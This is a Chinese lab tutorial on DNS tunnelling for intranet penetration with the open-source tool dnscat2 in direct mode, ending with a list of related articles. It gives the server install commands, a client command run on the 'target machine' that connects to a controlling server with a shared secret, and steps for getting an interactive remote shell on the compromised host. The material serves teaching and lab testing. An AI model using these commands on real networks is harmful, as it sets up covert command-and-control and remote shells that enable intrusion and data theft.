网络安全内网渗透之DNS隧道实验--dnscat2直连模式

目录

一、DNS隧道攻击原理

二、DNS隧道工具

(一)安装dnscat2服务端

(二)启动服务器端

(三)在目标机器上安装客户端

(四)反弹shell


一、DNS隧道攻击原理

在进行DNS查询时,如果查询的域名不在DNS服务器本机的缓存中,就会访问互联网进行查询,然后返回结果。入股哦在互联网上有一台定制的服务器,那么依靠DNS协议即可进行数据包的交换。从DNS协议的角度看,这样的操作只是在一次次地查询某个特定的域名并得到解析结果,但其本质问题是,预期的返回结果应该是一个IP地址,而事实上不是--返回的可以是任意字符串,包括加密的C&C指令。

二、DNS隧道工具

Dnscat2是一款开源软件,它使用DNS协议创建加密的C&C通信,通过预共享密钥进行身份验证;使用shell及DNS查询类型(A、AAAA、TXT、CNAME、MX),多个同时进行的会话类似SSH中的隧道。Dnscat2的客户端使用C语言编写的,服务端是用Ruby语言编写的。

使用dnscat2隧道的模式有两种,分别是直连模式和中继模式。

直连模式:客户端直接向指定IP地址的DNS服务器发起DNS解析请求;

中继模式:DNS经过互联网的迭代解析,指向指定的DNS服务器。与直连模式相比,中继模式的速度较慢。

如果内网放行所有的DNS请求,dnscat2会使用直连模式,通过UDP的53端口进行通信(不需要域名,速度快,而且看上去仍然像普通的DNS查询)。在请求日志中,所有的域名都是以"dnscat"开头的,因此防火墙可以很容易地将直连模式的通信检测出来。

如果内网中的请求仅限于白名单服务器或者特定的域,dnscat2会使用中继模式来申请一个域名,并将运行dnscat2服务端的服务器指定为受信任的DNS服务器。

本章实验以直连模式为测试模式。

(一)安装dnscat2服务端

dnscat2使用ubuntu系统,安装命令如下:

​
apt-get install -y gem

apt-get install -y ruby-dev(注意安装的时候系统崩了,重启后使用命令dpkg --configure -a)

apt-get install -y libpq-dev

apt-get install -y ruby-bundler

git clone https://github.com/iagox86/dnscat2.git

cd dnscat2/server

bundle install

(二)启动服务器端

ruby dnscat2.rb

(三)在目标机器上安装客户端

​git clone https://github.com/iagox86/dnscat2.git

不能在线git clone的话,使用其他方式上传到目标主机。

cd dnscat2/client/

make

./dnscat --dns server=192.168.101.105,port=53 --secret=9fb91ae03a857d46bd2c9b19ea9ef13a

结果如下:

服务端结果如下:

(四)反弹shell

使用windows查看可以连接的会话

window -i 1连接到会话1

help查看命令

shell命令执行后,创建window 4

使用window -i 4进入交互会话,ifconfig可以看到被控主机的IP是192.168.101.106,也就是dnscat客户端主机的IP地址

相关推荐
安全方案3 分钟前
政务安全体系构建中的挑战
安全
J老熊2 小时前
Linux下抓包分析Java应用程序HTTP接口调用:基于tcpdump与Wireshark的综合示例
java·linux·运维·web安全·http·面试
网安詹姆斯3 小时前
网络安全(黑客技术)2024年三个月自学手册
网络·python·sql·安全·web安全
程序员古德4 小时前
《系统安全架构设计及其应用》写作框架,软考高级系统架构设计师
安全·系统架构·系统安全
极小狐5 小时前
极狐GitLab DevSecOps 功能合集(七大安全功能)
安全·gitlab·devsecops·极狐gitlab·安全合规
PwnGuo5 小时前
Frida 脚本抓取 HttpURLConnection 请求和响应
安全
lv1级小菜鸟7 小时前
【网络安全】-ssrf服务器请求伪造攻击-burp
安全·网络安全
Agazigi11 小时前
Java开发安全及防护
安全
guowu66613 小时前
medium_socnet
运维·开发语言·网络·安全